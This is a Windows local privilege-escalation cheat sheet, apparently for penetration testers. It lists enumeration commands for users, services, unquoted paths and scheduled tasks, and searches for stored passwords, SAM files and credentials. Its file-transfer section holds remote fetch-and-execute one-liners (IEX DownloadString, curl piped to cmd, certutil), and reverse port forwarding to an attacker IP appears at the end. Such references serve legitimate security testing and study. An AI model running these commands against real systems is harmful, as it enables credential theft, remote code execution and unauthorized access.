# Local Windows Privilege Escalation
## OS
Get architecture & patches
```CMD
systeminfo
wmic qfe
```
Get Environment Variables
```CMD
set
```
```PowerShell
Get-ChildItem Env: | ft Key,Value
```
Get Connected Drives
```CMD
net use
wmic logicaldisk get caption,description,providername
```
```PowerShell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
## Users
Any interesting user privileges? Note: The State column does not mean that the user does or does not have access to this privilege. If the privilege is listed, then that user has it.
```CMD
whoami /priv
```
What users are on the system? Any old user profiles that weren’t cleaned up?
```CMD
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
```
```PowerShell
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
Is anyone else logged in?
```CMD
qwinsta
```
What local groups are on the system?
```CMD
net localgroup
```
```PowerShell
Get-LocalGroup | ft Name
```
Check Admnistrators Group users
```CMD
net localgroup Administrators
```
```PowerShell
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
```
Anything in the Registry for User Autologon?
```CMD
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
```
```PowerShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
```
Anything interesting in Credential Manager?
```CMD
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
```
```PowerShell
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
```
Can we access SAM and SYSTEM files?
```CMD
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
## Programs, Processes, and Services
What software is installed?
```CMD
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
```
```PowerShell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
Full Permissions for Everyone or Users on Program Folders?
```CMD
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
```
Modify Permissions for Everyone or Users on Program Folders?
```CMD
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
```
```PowerShell
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
```
You can also upload accesschk from Sysinternals to check for writeable folders and files.
```CMD
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
```
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
```CMD
tasklist /svc
tasklist /v
net start
sc query
```
Get-Process has a -IncludeUserName option to see the process owner, however you have to have administrative rights to use it.
```PowerShell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Get-Service
```
This one liner returns the process owner without admin rights, if something is blank under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.
```PowerShell
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```
Any weak service permissions? Can we reconfigure anything? Again, upload accesschk.
```CMD
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
```
Are there any unquoted service paths?
```CMD
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
```
```PowerShell
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
What scheduled tasks are there? Anything custom implemented?
```CMD
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
```
```PowerShell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
What is ran at startup?
```CMD
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
```PowerShell
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```
Is AlwaysInstallElevated enabled? I have not ran across this but it doesn’t hurt to check.
```CMD
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
## Networking
What NICs are connected? Are there multiple networks?
```CMD
ipconfig /all
```
```PowerShell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
Anything in the ARP cache?
```CMD
arp -a
```
```PowerShell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
Are there connections to other hosts?
```CMD
netstat -ano
```
Anything in the hosts file?
```CMD
C:\WINDOWS\System32\drivers\etc\hosts
```
Is the firewall turned on? If so what’s configured?
```CMD
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
```
Any other interesting interface configurations?
```CMD
netsh dump
```
Are there any SNMP configurations?
```CMD
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
```PowerShell
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## Interesting Files and Sensitive Information
Any passwords in the registry?
```CMD
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
```
Are there sysprep or unattend files available that weren’t cleaned up?
```CMD
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
```
```PowerShell
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
```
If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?
```CMD
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
```
```PowerShell
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
What’s in the IIS Logs?
```CMD
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
```
Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files?
```CMD
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
```
```PowerShell
Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
```
Any Apache web logs?
```CMD
dir /s access.log error.log
```
```PowerShell
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
```
Any interesting files to look at? Possibly inside User directories (Desktop, Documents, etc)?
```CMD
dir /s *pass* == *vnc* == *.config* 2>nul
```
```PowerShell
Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
```
Files containing password inside them?
```CMD
findstr /si password *.xml *.ini *.txt *.config 2>nul
```
```PowerShell
Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
```
## Techniques
### Transferring Files
PowerShell Cmdlet
```PowerShell
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
```
PowerShell One-Liner
```PowerShell
(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename")
```
PowerShell One-Line Script Execution in Memory
```PowerShell
IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
```
PowerShell with Proxy
```PowerShell
$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('https://server/script.ps1'));
```
PowerShell Script
```PowerShell
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://server/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```
Non-interactive FTP via text file. Useful for when you only have limited command execution.
```CMD
echo open 10.10.10.11 21> ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET filename>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
```
CertUtil
```CMD
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
```
Certutil can also be used for base64 encoding/decoding.
```CMD
certutil.exe -encode inputFileName encodedOutputFileName
certutil.exe -decode encodedInputFileName decodedOutputFileName
```
CURL
```CMD
curl http://server/file -o file
curl http://server/file.bat | cmd
```
And with PowerShell
```PowerShell
IEX(curl http://server/script.ps1);Invoke-Blah
```
### Port Forwarding
For example to expose SMB, on the target run:
```cmd
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
```
SSH enabled in Win10 1803 by default
```CMD
ssh -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
```
### Port Forwarding
## Resources
*
*
*